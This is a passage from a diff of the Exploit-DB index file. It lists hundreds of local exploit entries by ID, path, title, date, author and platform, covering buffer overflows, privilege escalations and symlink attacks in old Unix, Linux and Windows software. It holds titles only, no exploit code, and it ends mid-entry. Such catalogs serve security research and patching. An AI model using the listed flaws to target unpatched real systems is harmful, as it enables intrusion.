+21094,exploits/aix/local/21094.c,"AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Local Buffer Overflow",2000-09-01,"Last Stage of Delirium",local,aix, +21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows, +21098,exploits/hp-ux/local/21098.c,"HP-UX 11.0 - SWVerify Buffer Overflow",2001-09-03,foo,local,hp-ux, +21101,exploits/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",local,unix, +21105,exploits/unix/local/21105.c,"Digital Unix 4.0 - MSGCHK Buffer Overflow",2001-09-05,seo,local,unix, +21106,exploits/unix/local/21106.txt,"Taylor UUCP 1.0.6 - Argument Handling Privilege Escalation",2001-09-08,zen-parse,local,unix, +21107,exploits/unix/local/21107.sh,"Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,local,unix, +21108,exploits/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",local,unix, +21114,exploits/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",local,freebsd, +21117,exploits/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,local,multiple, +21120,exploits/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow",2001-10-16,"Niels Heinen",local,unix, +21124,exploits/linux/local/21124.txt,"Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation",2001-10-18,"Rafal Wojtczuk",local,linux, +21130,exploits/windows/local/21130.c,"Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",local,windows, +21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows, +40418,exploits/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,local,windows, +21150,exploits/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,local,unix, +21158,exploits/linux/local/21158.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,local,linux, +21159,exploits/linux/local/21159.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Local Buffer Overflow",2001-11-21,IhaQueR@IRCnet,local,linux, +21173,exploits/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak 'Username' and Password Encryption",2001-12-07,shoeboy,local,windows, +21176,exploits/freebsd/local/21176.c,"FreeBSD 4.4 - AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",local,freebsd, +40417,exploits/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,local,windows, +21216,exploits/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,local,linux, +21217,exploits/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,local,linux, +21218,exploits/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,local,linux, +21219,exploits/linux/local/21219.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",local,linux, +21226,exploits/linux/local/21226.c,"IMLib2 - Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",local,linux, +21227,exploits/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",local,linux, +21229,exploits/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",local,linux, +21231,exploits/linux/local/21231.c,"Chinput 3.0 - Environment Variable Buffer Overflow",2002-01-16,xperc,local,linux, +21239,exploits/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution",2002-01-20,jGgM,local,unixware, +21244,exploits/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",local,unix, +21247,exploits/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",local,linux, +21248,exploits/linux/local/21248.txt,"User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",local,linux, +21258,exploits/linux/local/21258.bat,"Microsoft Windows NT 4.0/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",local,linux, +21259,exploits/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",local,linux, +21280,exploits/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,local,linux, +21281,exploits/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,local,linux, +21282,exploits/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,local,atheos, +21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple, +21284,exploits/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,local,unixware, +21288,exploits/multiple/local/21288.txt,"Sawmill 6.2.x - Admin Password Insecure Default Permissions",2002-02-11,darky0da,local,multiple, +21290,exploits/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",local,unix, +21302,exploits/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",local,linux, +21318,exploits/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,local,windows, +21320,exploits/windows/local/21320.pl,"Internet Download Manager - Local Buffer Overflow (SEH)",2012-09-14,Dark-Puzzle,local,windows, +21323,exploits/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",local,linux, +21331,exploits/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",local,windows, +21341,exploits/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",local,linux, +21342,exploits/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",local,linux, +21344,exploits/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Escalation",2002-03-13,EliCZ,local,windows, +21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php, +21348,exploits/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,local,linux, +21351,exploits/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,local,windows, +21353,exploits/linux/local/21353.c,"Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC)",2002-03-26,cliph,local,linux, +21356,exploits/linux/local/21356.sh,"LogWatch 2.1.1/2.5 - Insecure Temporary Directory Creation",2002-03-27,spybreak,local,linux, +21359,exploits/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,local,multiple, +21360,exploits/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 - XSun Color Database File Heap Overflow",2002-04-02,gloomy,local,solaris, +21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux, +21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd, +21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux, +21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux, +21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd, +21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix, +21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix, +21420,exploits/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,local,linux, +21458,exploits/linux/local/21458.txt,"Grsecurity Kernel Patch 1.9.4 (Linux Kernel) - Memory Protection",2002-05-17,"Guillaume PELAT",local,linux, +21462,exploits/freebsd/local/21462.sh,"FreeBSD 4.x - Process Concealment Bypass",2002-05-18,anonymous,local,freebsd, +21489,exploits/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 - SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",local,sco, +21496,exploits/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec - Local Buffer Overflow (1)",2002-05-30,smurf,local,linux, +21497,exploits/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec - Local Buffer Overflow (2)",2002-05-30,pHrail,local,linux, +21499,exploits/linux/local/21499.txt,"QNX RTOS 4.25 - 'CRTTrap' File Disclosure",2002-05-31,"Simon Ouellette",local,linux, +21500,exploits/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",local,linux, +21501,exploits/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",local,linux, +21502,exploits/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,local,linux, +21503,exploits/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation",2002-06-03,badc0ded,local,linux, +21504,exploits/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation",2002-06-03,badc0ded,local,linux, +21505,exploits/linux/local/21505.c,"QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow",2002-06-03,badc0ded,local,linux, +21506,exploits/linux/local/21506.c,"QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow",2002-06-03,badc0ded,local,linux, +21507,exploits/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,local,linux, +21516,exploits/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 - Terminator Function Format String",2002-06-06,stringz,local,unix, +21538,exploits/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 - Open File Descriptor",2002-06-12,"Patrick Smith",local,linux, +21547,exploits/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Local Privilege Escalation",2012-09-27,X-Cisadane,local,windows, +21549,exploits/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",local,windows, +21550,exploits/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",local,windows, +21551,exploits/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 - XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",local,windows, +21565,exploits/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,local,unix, +21566,exploits/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,local,unix, +21568,exploits/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,local,linux, +40348,exploits/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",local,win_x86-64, +21577,exploits/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Local Buffer Overflow",2002-11-06,watercloud,local,hp-ux, +21583,exploits/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,local,linux, +21584,exploits/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",local,linux, +21585,exploits/linux/local/21585.c,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,local,linux, +21592,exploits/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 - Password Disclosure",2002-07-03,"Richard van den Berg",local,unix, +40440,exploits/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,local,multiple, +21623,exploits/linux/local/21623.txt,"Python 1.5.2 Pickle - Unsafe 'eval()' Code Execution",2002-07-17,"Jeff Epler",local,linux, +21624,exploits/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x - Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",local,linux, +21629,exploits/windows/local/21629.txt,"Adobe eBook Reader 2.2 - File Restoration Privilege Escalation",2002-07-19,"Vladimir Katalov",local,windows, +21666,exploits/linux/local/21666.txt,"soapbox 0.3.1 - Local Privilege Escalation",2012-10-02,"Jean Pascal Pereira",local,linux, +21667,exploits/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",local,linux, +21669,exploits/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",local,bsd, +40362,exploits/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,local,windows, +40365,exploits/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Local Privilege Escalation",2016-09-13,"Arash Khazaei",local,windows, +40429,exploits/windows/local/40429.cs,"Microsoft Windows 8.1 Update 2 / 10 10586 (x86/x64) - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",local,windows, +21674,exploits/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,local,linux, +21683,exploits/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",local,linux, +21684,exploits/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,local,windows, +21685,exploits/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",local,windows, +21686,exploits/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",local,windows, +21687,exploits/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",local,windows, +21688,exploits/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",local,windows, +21689,exploits/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",local,windows, +21690,exploits/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",local,windows, +21691,exploits/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,local,windows, +21700,exploits/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",local,linux, +21701,exploits/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",local,linux, +21713,exploits/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - Local Overflow (SEH + DEP Bypass)",2012-10-03,b33f,local,windows, +21720,exploits/irix/local/21720.txt,"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing",2002-08-16,"Michael Wardle",local,irix, +21721,exploits/windows/local/21721.html,"Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure",2002-08-17,Jelmer,local,windows, +21732,exploits/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",local,linux, +21733,exploits/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 - Predictable Temporary Filename Symbolic Link Attack",2002-06-28,"Charles Stevenson",local,linux, +21758,exploits/unix/local/21758.txt,"Caldera X Server 7.1/8.0 - External Program Privileged Invocation",2002-08-27,"Olaf Kirch",local,unix, +21760,exploits/unix/local/21760.c,"GDAM123 0.933/0.942 - Filename Buffer Overflow",2002-08-24,"Netric Security",local,unix, +21761,exploits/linux/local/21761.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,local,linux, +21762,exploits/linux/local/21762.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",local,linux, +21763,exploits/linux/local/21763.txt,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)",2002-08-28,syscalls,local,linux, +21771,exploits/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation",2002-09-04,eSDee,local,unix, +21772,exploits/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,local,unix, +21773,exploits/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,local,unix, +21774,exploits/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,local,unix, +21781,exploits/windows/local/21781.c,"Trillian Instant Messaging 0.x - Credential Encryption",2002-09-09,"Coeus Group",local,windows, +21790,exploits/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ Authenticate Privilege Escalation",2002-06-28,"Charles Stevenson",local,unix, +21793,exploits/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,local,linux, +21796,exploits/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,local,unix, +21797,exploits/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,local,unix, +21798,exploits/freebsd/local/21798.txt,"WMMon 1.0 b2 - Memory Character File Open File Descriptor Read",2002-09-16,badc0ded,local,freebsd, +21799,exploits/freebsd/local/21799.txt,"WMNet2 1.0 6 - Kernel Memory File Descriptor Leakage",2002-09-16,badc0ded,local,freebsd, +21805,exploits/unix/local/21805.c,"Cisco VPN 5000 Client - Buffer Overrun (1)",2002-09-18,BrainStorm,local,unix, +21806,exploits/unix/local/21806.c,"Cisco VPN 5000 Client - Buffer Overrun (2)",2002-09-18,zillion,local,unix, +21807,exploits/unix/local/21807.pl,"HP Tru64/OSF1 DXTerm - Local Buffer Overflow",2002-07-03,stripey,local,unix, +21814,exploits/linux/local/21814.c,"AlsaPlayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,local,linux, +21815,exploits/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",local,osx, +21884,exploits/unix/local/21884.txt,"Sendmail 8.12.x - SMRSH Double Pipe Access Validation",2002-10-01,zen-parse,local,unix, +21881,exploits/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,local,bsd, +21831,exploits/windows/local/21831.c,"PLIB 1.8.5 - 'ssg/ssgParser.cxx' Local Buffer Overflow",2012-10-09,"Andrés Gómez",local,windows, +21843,exploits/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,local,windows, +21844,exploits/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,local,windows, +21845,exploits/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,local,windows, +21848,exploits/linux/local/21848.rb,"Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)",2012-10-10,Metasploit,local,linux, +21856,exploits/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",local,multiple, +21865,exploits/linux/local/21865.c,"Interbase 5/6 - GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,local,linux, +21871,exploits/linux/local/21871.c,"GV 2.x/3.x - '.PDF'/'.PS' File Buffer Overflow (1)",2002-09-26,zen-parse,local,linux, +21872,exploits/linux/local/21872.c,"GV 2.x/3.x - '.PDF'/'.PS' File Buffer Overflow (2)",2002-09-26,infamous42md,local,linux, +21887,exploits/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink",2012-10-11,fb1h2s,local,windows, +21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows, +21904,exploits/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow",2003-04-16,watercloud,local,aix, +21922,exploits/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,local,windows, +21923,exploits/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,local,windows, +21980,exploits/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,local,linux, +21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,local,windows, +21994,exploits/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,local,windows, +22002,exploits/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,local,linux, +22014,exploits/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",local,linux, +22055,exploits/linux/local/22055.txt,"SUIDPerl 5.6 - Information Disclosure",2002-11-29,zen-parse,local,linux, +22066,exploits/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",local,linux, +22067,exploits/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",local,unix, +22069,exploits/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",local,multiple, +22120,exploits/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall - Spoofed Message Origin",2003-01-03,"Brant Roman",local,solaris, +22128,exploits/linux/local/22128.c,"H-Sphere WebShell 2.4 - Local Privilege Escalation",2003-01-06,"Carl Livitt",local,linux, +22189,exploits/linux/local/22189.txt,"MTink 0.9.x - Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",local,linux, +22190,exploits/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow",2003-01-21,"Karol Wiesek",local,linux, +22193,exploits/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 - Archive File Extension Buffer Overrun",2003-01-22,nesumin,local,windows, +22203,exploits/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command - Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",local,solaris, +22210,exploits/openbsd/local/22210.txt,"OpenBSD 2.x/3.x - CHPass Temporary File Link File Content Revealing",2003-02-03,"Marc Bevand",local,openbsd, +22212,exploits/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,local,linux, +22225,exploits/windows/local/22225.txt,"Microsoft Windows XP - Redirector Privilege Escalation",2003-02-05,Nsfocus,local,windows, +22231,exploits/hp-ux/local/22231.txt,"HPUX 10.20/11 Wall Message - Local Buffer Overflow",2003-02-07,Scotty,local,hp-ux, +22233,exploits/linux/local/22233.c,"Nethack 3 - Local Buffer Overflow (1)",2003-02-10,tsao@efnet,local,linux, +22234,exploits/linux/local/22234.c,"Nethack 3 - Local Buffer Overflow (2)",2003-02-10,bob@dtors.net,local,linux, +22235,exploits/linux/local/22235.pl,"Nethack 3 - Local Buffer Overflow (3)",2003-02-10,tsao@efnet,local,linux, +22246,exploits/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",local,hp-ux, +22247,exploits/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,local,hp-ux, +22248,exploits/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unauthorized Access",2003-02-12,"Last Stage of Delirium",local,hp-ux, +22265,exploits/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Local Privilege Escalation",2003-02-19,deadbeat,local,linux, +22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple, +22332,exploits/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,local,unix, +22331,exploits/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",local,unix, +22320,exploits/linux/local/22320.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",local,linux, +22321,exploits/linux/local/22321.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",local,linux, +22322,exploits/linux/local/22322.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (3)",2003-03-03,omega,local,linux, +22323,exploits/linux/local/22323.c,"XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (4)",2003-03-03,axis,local,linux, +22324,exploits/unix/local/22324.c,"File 3.x - Local Stack Overflow Code Execution (1)",2003-03-04,lem0n,local,unix, +22325,exploits/unix/local/22325.c,"File 3.x - Local Stack Overflow Code Execution (2)",2003-03-04,lem0nxx,local,unix, +22326,exploits/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,local,linux, +22329,exploits/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,local,windows, +22335,exploits/unix/local/22335.pl,"Tower Toppler 0.99.1 - 'Display' Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",local,unix, +22340,exploits/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Local Privilege Escalation",2003-03-08,bugsman@libero.it,local,linux, +22344,exploits/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",local,linux, +22354,exploits/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,local,windows, +22362,exploits/linux/local/22362.c,"Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)",2003-03-17,anszom@v-lo.krakow.pl,local,linux, +22363,exploits/linux/local/22363.c,"Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)",2003-04-10,"Wojciech Purczynski",local,linux, +22376,exploits/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 - Format String",2003-03-28,"Core Security",local,linux, +22442,exploits/unix/local/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,local,unix, +22452,exploits/linux/local/22452.sh,"ChiTeX 6.1.2 - Local Privilege Escalation",2003-04-03,zillion,local,linux, +22456,exploits/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 - Symbolic Link Following Configuration File",2003-04-03,"Carl Livitt",local,linux, +22458,exploits/linux/local/22458.c,"Linux Kernel 2.2.x/2.4.x - I/O 